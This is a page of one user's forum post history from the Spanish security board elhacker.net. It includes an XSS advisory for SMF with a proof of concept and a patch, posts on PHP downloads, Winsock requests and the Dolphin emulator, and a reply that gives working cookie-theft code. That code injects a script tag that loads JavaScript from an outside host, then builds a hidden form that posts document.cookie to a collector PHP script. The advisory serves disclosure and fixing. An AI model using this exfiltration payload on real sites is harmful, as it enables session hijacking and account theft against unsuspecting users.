elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 ... 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 [353] 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 ... 456
3521  Seguridad Informática / Nivel Web / XSS en el input "Sitio WEB" dentro del perfil de usuario en: 30 Noviembre 2009, 09:16 am
Detalles
Descripción:XSS en el input "Sitio WEB" dentro del perfil de usuario
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Profile-Modify.php:802
URL Vulnerable:N/A
PoC:‭‬‭‬ ‭‬‭‬‭‬javascript:alert(document.cookie);//http://xx
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2

Descripción

La vulnerabilidad se localiza en el archivo Sources/Profile-Modify.php
Linea 802
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Profile-Modify.php#802
Código
  1. if (strlen(trim($value)) > 0 && strpos($value, \'://\') === false)
  2.  $value = \'http://\' . $value;

Ya que permite la inyección de código arbitrario debido a que verifica
únicamente que contenga los carácteres "://" pero no indicaron en que
posición del string debería estar por lo cual puedes escribir "://" al
final del código inyectado encapsulandolo en un comentario tal como el
siguiente ejemplo.

PoC:
En el perfil de tu usuario pon lo siguiente en el input de "Website URL"
‭‬‭‬‭‬‭‬‭‬javascript:alert(document.cookie);//http://xx

Solución

Código original de SMF 1.1.10 en Sources/Profile.php linea 602
Código
  1. // Fix the URL...
  2. 	if (isset($_POST['websiteUrl']))
  3. 	{
  4. 		if (strlen(trim($_POST['websiteUrl'])) > 0 && strpos($_POST['websiteUrl'], '://') === false)
  5. 			$_POST['websiteUrl'] = 'http://' . $_POST['websiteUrl'];
  6. 		if (strlen($_POST['websiteUrl']) < 8)
  7. 			$_POST['websiteUrl'] = '';
  8. 	}
  9.  

reemplazar por
Código
  1. if($_POST['websiteUrl']){
  2.  $permitidos = array('http', 'https', 'ftp', 'ftps');
  3.  $protocolo = @explode('://', $_POST['websiteUrl']);
  4.  $protocolo = $protocolo[0];
  5.  foreach($permitidos as $permitido){
  6.   if(strtolower($protocolo) == strtolower($permitido)){
  7.    $valido = true;
  8.    break;
  9.   }
  10.  }
  11.  /* La url comienza con un protocolo no válido */
  12.  if(!$valido)
  13.   $_POST['websiteUrl'] = 'http://'.$_POST['websiteUrl'];
  14.  unset($permitidos, $permitido, $protocolo, $valido); /* Libera memoria */
  15.  
  16.  /* Elimina urls no válidas */
  17.  if(strlen($_POST['websiteUrl']) < 8)
  18.   unset($_POST['websiteUrl']);
  19. }

Código original de SMF 2.0 RC2 en Sources/Profile-Modify.php linea 753
Código
  1. // Fix the URL...
  2. 			'input_validate' => create_function('&$value', '
  3.  
  4. 				if (strlen(trim($value)) > 0 && strpos($value, \'://\') === false)
  5. 					$value = \'http://\' . $value;
  6. 				if (strlen($value) < 8)
  7. 					$value = \'\';
  8. 				return true;
  9. 			'),

Reemplazar por
Código
  1. // Parche - Fix the URL...
  2. 'input_validate' => create_function('&$value', '
  3. if($_POST["websiteUrl"]){
  4.  $permitidos = array("http", "https", "ftp", "ftps");
  5.  $protocolo = @explode("://", $_POST["websiteUrl"]);
  6.  $protocolo = $protocolo[0];
  7.  foreach($permitidos as $permitido){
  8.   if(strtolower($protocolo) == strtolower($permitido)){
  9.    $valido = true;
  10.    break;
  11.   }
  12.  }
  13.  
  14.  /* La url comienza con un protocolo no válido */
  15.  if(!$valido)
  16.   $_POST["websiteUrl"] = "http://".$_POST["websiteUrl"];
  17.  unset($permitidos, $permitido, $protocolo, $valido); /* Libera memoria */
  18.  
  19.  /* Elimina urls no válidas */
  20.  if(strlen($_POST["websiteUrl"]) < 8)
  21.   unset($_POST["websiteUrl"]);
  22. }
  23. '),
3522  Seguridad Informática / Nivel Web / Re: Necesito ayuda con xss. La cookie esta muy larga. en: 30 Noviembre 2009, 06:28 am
ese ultimo era el ejemplo xD
3523  Seguridad Informática / Nivel Web / Re: Hackea a Elhacker.net ! [Finalizado - Ganador: yasión] en: 30 Noviembre 2009, 04:58 am
Citar
Se puede seguir probando cosas en este post?

Mira, puedes utilizar xampp xD
http://www.apachefriends.org/en/xampp-windows.html

El concurso ya terminó.
3524  Programación / PHP / Re: Evitar descarga de archivos si el usuario no esta logueado en: 29 Noviembre 2009, 09:03 am
Hla puedes hacer un archivo .htaccess y un .htpasswd para crear un nombre de usuario y contraseña pero lo malo es que si quieres cambiar el usuario tendrás que cambiar el archivo y no es muy productivo :-/

Lo otro que puedes hacer es obtener el archivo desde un php, o sea test.php?archivo=test.rar y entonces el php dirá fopen() a test.rar (cuidado con los retrocesos de directorio ../ ) y le vas haciendo echo al contenido que te vaya devolviendo el fread y recuerda no abrirlo completamente de una sola ves, o sea... cuando haces fread() le indicas el manipulador (handle) y la cantidad de carácteres que desea obtener del archivo, por lo general muchos utilizan filesize por lo tanto obtiene todo el archivo de una sola ves, si el archivo es muy grande entonces php no podrá cargar todo en memoria y dará error, por o tanto te recomiendo que le hagas un while de a 1024 carácteres y vas lanzando echo inmediatamente, luego cuando termine el while le haces fclose y exit; para que el resto de la web no intervenga en el contenido del archivo y de cabezera le pones que el tipo de archivo es ocet-stream para forzar al explorador su descarga.

Saludos.
3525  Programación / Programación Visual Basic / Re: URLDownloadToFileA hace saltar el antivirus? en: 29 Noviembre 2009, 08:57 am
Porque no usas winsock y le mandas las cabezeras manualmente?

Código:
GET /archivo HTTP/1.1
Connection: close
Host: dominio.com

Con dos saltos de linea al final y obtienes el contenido desde un evento de winsock y lo filtras por una variable temporal y lo guardas en un archivo.

El servidor te devolverá un status 200 cuando el archivo solicitado existe y te enviará una cabezera antes del archivo... solamente separas el primer salto de linea vacio y todo el resto corresponderá al archivo que necesitas.
3526  Seguridad Informática / Nivel Web / Re: Necesito ayuda con xss. La cookie esta muy larga. en: 29 Noviembre 2009, 08:16 am
Si quieres ahorrar código puedes inyectar esto en formato HTML:
Código:
<script src="http://miweb.com/xss.js"></script>

Entonces trabajas sobre archivo de ‭‬‭‬javascript y vas reuniendo variables y vas creando inputs y te envías la petición:

xss.js
Código:
 try{
  payload =  '<form name="xss_form" id="xss_form" action="http://miweb.com/xss.php" method="post">';
  payload += '<input type="hidden" name="cookie" value="' + escape(document.cookie) + '" />';
  payload += '</form>';
  document.write(payload);
  document.xss_form.submit();
 }catch(e){}

Ahora puedes unir todo en un solo archivo php donde si llega una petición post entonces procesa los datos y lo guarda y redirecciona a google y si no llega ninguna peticion post entonces que se muestre el contenido del ‭‬‭‬javascript, así puedes lanzar el xss con la url hacia tu php:
Código:
<script src="http://miweb.com/xss.php"></script>

Ahora otra forma sería hacer un document.location hacia '#' + document.cookie y despues haces una segunda redirección hacia tu script y obtienes la cookie desde la referencia :P

Saludos.
3527  Media / Juegos y Consolas / Re: Super Smash Bros Brawl PAL - PC, Wii Dolphin Rev 2661 es Ahora compatible en: 29 Noviembre 2009, 05:43 am
Ya lo pude hacer funcionar con esta actualización del directx
http://rs630.rapidshare.com/files/218959649/dx-mar09.zip

pesa casi 100 mb xD

Me corre pero como todos los emuladores grandes muy lentos, imposibles de jugar :(
Yo tengo esto en mi lap:







Pero a pesar de tener 1g de video y y 2g de ram no puedo hacer que corra desentemente y no estoy lagueado por otros programas ni nada, yo juego el assasian cred super bién con alta calidad de detalle.
3528  Media / Juegos y Consolas / Re: Super Smash Bros Brawl PAL - PC, Wii Dolphin Rev 2661 es Ahora compatible en: 29 Noviembre 2009, 04:55 am
Yo lo bajé y lo probé con dolphin 4620 para un pocesador de 32 pero trae un defecto que impide que se pueda usar en windows 7 y es la librería del comando, solo funciona si usas directx 8 o 9 pero windows 7 viene con el 11 y no te deja jugar.

Si alguien tiene dolphin y quiere bajar el juego para usarlo en windows vista o 7 no pierda su tiempo xD
Mejor me buscaré otro emulador.
3529  Seguridad Informática / Nivel Web / Re: Hackea a Elhacker.net ! [Finalizado - Ganador: yasión] en: 29 Noviembre 2009, 00:43 am
Bueno veo que ya te citaste y no te vo por eso repetí lo mismo jajaja.

Ahora, de que se trata ese ))))))) ? no se los voy a explicar porque forma parte del reclutamiento de simpleaudit xDDDDDD pero a penas se haga la publicación de los bugs voy a hacer un esfuerzo mental para tratar de explicarlo xD

PD: si alguien quiere insertar textos con bbcode sin que se interpreten basta con tan solo encerrarlo con [nobbc][/nobbc]

Por ejemplo:
[quote]test[/quote]

El post que dices es este:
http://foro.elhacker.net/nivel_web/proyecto_de_auditoria_a_smf_20_laboratorio_de_bugsnivel_web-t271095.0.html;msg1341433#msg1341433
3530  Seguridad Informática / Nivel Web / Re: Hackea a Elhacker.net ! [Finalizado - Ganador: yasión] en: 28 Noviembre 2009, 21:10 pm
Ahi va la oreja de YST  :xD
Páginas: 1 ... 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 [353] 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines